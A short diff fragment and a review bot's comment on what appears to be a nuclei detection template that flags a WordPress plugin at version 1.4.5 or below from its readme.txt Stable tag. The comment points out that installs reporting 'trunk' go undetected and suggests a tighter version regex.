+ - compare_versions(version, '<= 1.4.5')
\ No newline at end of file
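Review bot: The version extractor `(?mi)Stable tag: ([0-9.]+)` yields no capture for a readme that says `Stable tag: trunk`, and under `matchers-condition: and` the `compare_versions(version, '<= 1.4.5')` matcher then fails (as far as I can tell nuclei treats an unresolvable DSL variable as a non-match), so such installs are silently dropped rather than surfaced as unknown-version. There is no second version source in readme.txt to fall back on, so the honest fix is to document the limitation in the empty `description`, e.g. `Version check on readme.txt Stable tag; installs whose readme reports trunk are not detected.` The `[0-9.]+` class will also accept a trailing `.` (e.g. `1.4.5.`), which `compare_versions` may not parse; `([0-9]+(?:\\.[0-9]+)*)` is tighter.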